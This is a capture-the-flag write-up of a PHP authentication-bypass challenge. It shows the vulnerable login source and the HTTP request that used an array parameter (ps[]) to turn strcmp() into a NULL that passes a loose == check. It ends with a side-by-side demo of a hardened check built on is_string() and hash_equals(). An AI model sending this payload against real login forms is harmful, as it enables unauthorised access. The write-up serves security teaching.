Web 200
This challenge was about a flaw in a PHP comparison function. The source was given, and once again the following lines were the interesting part:
```php
<?php
include("./otp_util.php");
$flag = file_get_contents($flag_file);
if (isset($_POST["id"]) && isset($_POST["ps"])) {
    $password = make_otp($_POST["id"]);
    sleep(3); // do not bruteforce
    if (strcmp($password, $_POST["ps"]) == 0) {
        echo "welcome, ".$_POST["id"]."";
        echo "";
        if ($_POST["id"] == "127.0.0.1") {
            echo "<pre>".$flag."</pre>";
        }
    } else {
        echo "<script>alert('login failed..');history.back();</script>";
    }
}
?>
```
If $_POST['ps'] is an array, strcmp() (on PHP 5.x/7.x) emits a warning and returns NULL instead of an integer, and under the loose `==` comparison NULL == 0 is true (same value, not the same type), so the check passes without knowing the OTP. PHP 8 instead throws a TypeError for the array argument.
```
$ php -r "var_dump(strcmp('anything',array()));" // returns NULL
```
So I got the flag with the following HTTP request:
```
POST /site/page/login_ok.php HTTP/1.1
Host: 58.229.122.15:31338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://58.229.122.15:31338/site/
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

id=127.0.0.1&ps[]=blah
```
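To show the defect and the fix side by side, here is an added example (my own code, not the challenge's) with the loose strcmp() check next to a hardened comparison; the function names and the sample OTP are constructed for the demo.

```php
<?php
// Added example, not the challenge's own code; function names are hypothetical.
// Compares the loose strcmp() check with a hardened one and shows what an
// array submitted as ps[]=... does to each.

// Vulnerable pattern from the challenge: on PHP 5.x/7.x strcmp() with an
// array argument emits a warning and returns NULL, and NULL == 0 is true.
function login_ok_loose(string $expected, $submitted): bool
{
    return @strcmp($expected, $submitted) == 0;
}

// Hardened: only strings are ever compared, and hash_equals() returns a
// strict boolean in constant time, so neither type juggling nor timing
// differences help an attacker.
function login_ok_strict(string $expected, $submitted): bool
{
    if (!is_string($submitted)) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

$otp = "8f3a1c";                        // constructed sample OTP
$inputs = [
    "correct string"    => "8f3a1c",
    "wrong string"      => "blah",
    "array (ps[]=blah)" => ["blah"],    // what ps[]=blah decodes to
];

foreach ($inputs as $label => $ps) {
    try {
        $loose = login_ok_loose($otp, $ps) ? "accepted" : "rejected";
    } catch (TypeError $e) {
        // PHP 8 turns the warning into a TypeError: a crash, not a login.
        $loose = "TypeError";
    }
    $strict = login_ok_strict($otp, $ps) ? "accepted" : "rejected";
    printf("%-20s loose=%-9s strict=%s\n", $label, $loose, $strict);
}
```

On PHP 5.x/7.x the array case is accepted by the loose check and rejected by the strict one; the is_string() guard is what closes the hole, independent of PHP version.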